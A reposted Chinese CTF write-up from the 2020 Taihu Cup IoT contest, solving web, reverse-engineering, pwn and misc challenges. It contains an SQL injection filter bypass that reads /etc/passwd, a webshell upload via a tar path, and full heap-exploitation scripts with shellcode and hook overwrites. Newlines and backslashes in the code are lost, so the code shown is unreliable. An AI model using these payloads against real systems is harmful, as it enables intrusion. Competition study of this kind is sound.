点击蓝字 关注我们
CheckLnGame
只需要把view.js 的时间代码给删掉,然后在搞定连连看游戏就ok
easyWeb
看服务端相应是python,第一时间想到就是ssti,但是{被过滤,又看到题目提示必须是字符,才想起来可以魔改
然后又发现过滤了引号,直接用request.args来绕过就ok
CroosFire
上传绕过无果,应该设置的是白名单,然后发现可以存在一个id,经测试发现id存在注入,可以爆破出数据库为shuyu
发现没做任何过滤,就一个union 和select 过滤了,但是可以利用双写来绕过,
所以可以直接读取文件
ununionion seselectlectload_file(0x2f6574632f706173737764)
直接读取index.php,分析
原来index还存在一个submit1,且自带一个tar.py,在根目录上,可以读取文件,
import tarfile
import sys
tar = tarfile.open(sys.argv[1],"r")
tar.extractall()
可以直接把tar压缩到/tmp目录下,
所以只用改下压缩包的绝对路径就可以得到php木马
easy-app
打开apk发现有native库,直接把so拖入ida,分析主程序如下:
首先输入的字符串判断是否是flag{xxxx}的形式,而且总长度是否为38,不是则报错退出然后中间32字节经过check1函数处理,进行0-15位和16-31的高位互换,
然后再经过一个标准TEA加密
这里的key是假的:
调试的时候才发现实际是这样的:
原来是JNI_Onload的时候才修改掉。
然后就是base64encode,再和固定字符串比较,相等表示成功。
但是这里的base64encode是魔改的:
3->4的bit顺序为: [12,13,14,15,0,1,22,23,8,9,10,11,2,3,4,5,6,7,16,17,18,19,20,21]
同时base表也有变化:
abcdefghijklmnopqrstuvwxyz!@#$%^&*()ABCDEFGHIJKLMNOPQRSTUVWXYZ+/
最后用手工方式对e)n*pNe%PQy!^oS(@HtkUu+Cd$#hmmK&ieytiWwYkIA=进行解base64,得到:3448e110fc5e633d1ad9f3a24dbacafb8526703747b8c320608113588ebc90ab
再用TEA解密得到:
6560343634356738373535653135306232323361603136343962316361673535
转ascii以后是:e`4645g8755e150b223a`1649b1cag55
还需要最后一步处理才是flag,就是高位替换
最后得出flag为:flag{504fd5787e5eae02bb3101f4921c175e}
easyKooc
Jeb反编译后存在Add、Delete函数,典型的堆漏洞
free后未置0,delete函数有double free漏洞
系统存在金丝雀保护
编辑内容为33字节可获得canary数值,通过canary可以进行栈溢出
Edit('d'*0x21)
canary=u32(p.recvuntil("n")[-4:-1].rjust(4,"x00"))
进行double free后完成栈迁移,直接迁移至shellcode,获得shell交互
Add(6,'6'*0x18+p32(canary)+p32(0)+p32(stack))
Add(7,p32(canary)+p32(0)+p32(stack+0x34)+shellcode)
import sysfrom pwn import *context.log_level = 'debug'context(arch='mips', os='linux', endian='little', word_size=32)p = remote("121.36.166.138", 8890)def Menu(idx):p.sendlineafter("choicen", str(idx))def Add(idx, content):Menu(1)p.sendlineafter('n', str(idx))p.sendafter('n', content)def Delete(idx):Menu(2)p.sendlineafter('n',str(idx))def Edit(content):Menu(3)p.sendafter('n',content)shellcode = "x69x6ex02x3cx2fx62x42x34x00x00xa2xafx68x00x02x3cx2fx73x42x34x04x00xa2xafx00x00xa4x27xabx0fx02x24x00x00x05x24x00x00x06x24x0cx00x00x00"p.sendlineafter("motto!n",shellcode)p.recvuntil("you: 0x")stack_addr=int(p.recv(8),16)#gdb.attach(p)Edit('d'*0x21)canary=u32(p.recvuntil("n")[-4:-1].rjust(4,"x00"))#gdb.attach(p)Edit('x00'*(0x20-4)+p32(0x41)+p32(canary))Add(1,'a'*8)Add(2,'b'*8)Add(3,'c'*8)#gdb.attach(p)Delete(1)Delete(2)Delete(1)#gdb.attach(p)Add(4,p32(stack_addr+0x20))Add(5,'5'*8)Add(6,'6'*0x18+p32(canary)+p32(0)+p32(stack_addr))Add(7,p32(canary)+p32(0)+p32(stack_addr+0x34)+shellcode)#gdb.attach(p)Menu(4)p.interactive()
manager
发现系统存在过滤,禁止执行execve,需要通过orw方法读取跟目录flag
在edit的时候利用的realloc,len为0则会free掉,存在uaf漏洞
因此本题利用_free_hook来orw-heap,读取flag,脚本如下:
#!/usr/bin/env python#coding:utf-8from pwn import *p = remote('122.112.231.25',8004)#p = process("./pwn")context(arch='amd64',os='linux')s = lambda data :p.send(str(data))sa = lambda delim,data :p.sendafter(str(delim), str(data))sl = lambda data :p.sendline(str(data))sla = lambda delim,data :p.sendlineafter(str(delim), str(data))r = lambda numb=4096 :p.recv(numb)ru = lambda delims, drop=True :p.recvuntil(delims, drop)pi = lambda :p.interactive()rs = lambda *args, **kwargs :p.start(*args, **kwargs)dbg = lambda gs='', **kwargs :p.debug(gdbscript=gs, **kwargs)uu32 = lambda data :u32(data.ljust(4, '�'))uu64 = lambda data :u64(data.ljust(8, '�'))def Add(number,length,info='n',name='n'):sla('>>>',1)sa('Name',name)sla('Number',number)sla('len',length)sa('Info',info)def Remove(number):sla('>>>',3)sla('Number',number)def Edit(number,choice,length,info='n'):sla('>>>',2)sla('Number',number)sla('>',choice)sla('len',length)if length != 0:sa('info',info)def Show(number):sla('>>>',4)sla('number',number)def Edit2(payload):sla('>>>',2)sla('Number',4)sla('>',1)sa('name',payload)sla(':','x02x01')sla(':','x01x26')Add(0,0x80)Add(1,0x20) #防止与top chunk合并Remove(0) #泄露main_areaAdd(0,0x80)Show(0) #获得main_area88地址#gdb.attach(p)libc_base = uu64(ru('x7f',drop=False)[-6:]) - 0x3c4b0apop_rdi = libc_base+0x21112pop_rsi = libc_base+0x202f8pop_rdx = libc_base+0x1b92Add(2,0x20)Add(3,0x20)Remove(3)Remove(2)Add(2,0x20)Show(2)ru('Info:') #获得堆基址heap_base = uu64(r(6))-0xa#gdb.attach(p)payload = p64(0)+p64(0x71)+'n'Add(3,0x30,info=payload)Add(4,0x50,info=p64(0x21)*10,name=p64(0x21)*2)Add(5,0x60,'./flagx00x00'*8)Add(6,0x60)Edit(5,2,0)Remove(6)Remove(5)environ = libc_base + 0x3c6f38Add(5,0x60,p64(heap_base+0x3a0)+'n')Add(6,0x60)payload = p64(0)*5+p64(0x21)+p64(environ)+p64(4)+p64(heap_base+0x190)Add(7,0x60,payload+'n')#gdb.attach(p)Add(8,0x68,payload+'n')Edit(0,2,0x80,info=p64(heap_base+0x400)+p64(0x20))Show(4)stack = uu64(ru('x7f',drop=False)[-6:])#gdb.attach(p)payload = p64(0)*5+p64(0x21)+p64(libc_base+0x5f14b0)+p64(4)+p64(heap_base+0x190)Edit(8,2,0x68,info=payload+'n')sigframe = SigreturnFrame() #构造pop链sigframe.rax = 0sigframe.rdi = heap_basesigframe.rsi = 0x1000sigframe.rdx = 7sigframe.rip = libc_base + 0x101830sigframe.rsp = heap_base + 0x198free_hook = 0x3c67a8+libc_basepayload = p64(0)*5+p64(0x21)+p64(free_hook)+p64(4)+p64(heap_base+0x190)Edit(8,2,0x68,info=payload+'n')#gdb.attach(p)payload = p64(libc_base + 0x47b85)Edit2(payload)Add(9,0xf0,str(sigframe))payload = p64(0)*5+p64(0x21)+p64(heap_base+0x800)+p64(4)+p64(heap_base+0x190)Edit(8,2,0x68,info=payload+'n')Edit(0,2,0x80,'A'*8+p64(pop_rdi) + p64(heap_base+0x0d0)+p64(pop_rsi) + p64(0)+p64(libc_base+0xf70f0) +p64(pop_rdi)+p64(3) + p64(pop_rdx)+p64(0x30)+p64(pop_rsi)+p64(heap_base+0x400)+p64(libc_base+0xf7310)+p64(pop_rdi) + p64(heap_base+0x400)+p64(libc_base+0x6f6a0)+'./flag�')#gdb.attach(p)Add(10,0x20,'./flagx00')Remove(4)pi()
misc1
首先word打开,勾选隐藏文件
发现存在隐藏内容waoootu.epj,nvo 和www.verymuch.net
点开网址发现没啥东西,根据waoootu.epj,nv o,空格、点号、逗号等特征推测希尔加密
解密为:love and peaceee
直接把密文base64解密出现Salted__,猜测为AES之类的加密,逐个尝试发现为Rabbit加密,在线rabbit解密为
得到字符串在进行base32解密
在uncode转化为中文
在新约佛论蝉在线解密
得到:Live beautifully, dream passionately,love completely.
发现为fun.zip解压密码,解压得到fun.wav
然后查看频普图,得到flag
misc
volatility一把梭,filescan搜png然后dumpfiles下载下来,得到flag
seven hero
add 使用的是calloc edit使用的realloc 所以edit可以当free 而且可以造成uaf
然后改_malloc_hook为one_gadget
#!/usr/bin/env python# author:k0sqlerfrom pwn import *context.arch = 'amd64'context.log_level='debug'context.binary = './pwn'file_name = './pwn'local = 1ip = '119.3.89.93'port = 8011elf = ELF(file_name)libc = elf.libcsl = lambda x : p.sendline(x)sd = lambda x : p.send(x)sla = lambda x,y : p.sendlineafter(x,y)sda = lambda x,y : p.sendafter(x,y)rud = lambda x : p.recvuntil(x,drop=True)ru = lambda x : p.recvuntil(x)rc = lambda x : p.recv(x)rl = lambda : p.recvline()li = lambda name,x : log.info(name+':'+hex(x))ls = lambda name,x : log.success(name+':'+hex(x))pi = lambda : p.interactive()pcls = lambda : p.close()######################################### define interactive functiondef add(idx,size,content):sla("choice:n",'1')sla("index: ",str(idx))sla("size: ",str(size))sla("content: ",content)def edit(idx,size,content):sla("choice:n",'2')sla("index: ",str(idx))sla("size: ",str(size))sda("content: ",content)def free_1(idx,size=0):sla("choice:n",'2')sla("index: ",str(idx))sla("size: ",str(size))def show(idx):sla("choice:n",'4')sla("index: ",str(idx))def free(idx):sla("choice:n",'3')sla("index: ",str(idx))def call():sla("choice:n",'5')def backdoor(content):sla("choice:n",'666')ru("gift: ")leak=int(rc(14),16)-0x264140sla("string: ",content)return leak# end######################################## start pwndef pwn():global pglobal libcglobal elfif args.R:p = remote(ip,int(port))else:p = process(file_name)#########################################for i in range(8):add(i,0x10)for i in range(5):free(i+2)free_1(1)free_1(0)show(0)ru('content: ')heap_leak=u64(rc(6).ljust(8,'x00'))-0x2a0log.success('heap'+hex(heap_leak))free_1(7,0)edit(7,0x10,p64(heap_leak+0x250))add(3,0x10)add(3,0x10)libc_base=backdoor('1111')for i in range(8):add(i+9,0x59)for i in range(7):free(i+1+9)free_1(9)edit(9,0x59,p64(libc_base+libc.sym["__malloc_hook"]-0x23))add(18,0x59)add(19,0x59,'a'*0x13+p64(libc_base+1076984))pi()# end#########################################if __name__ == '__main__':pwn()
本文始发于微信公众号(IDLab):2020首届“太湖杯” 物联网安全攻防大赛
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论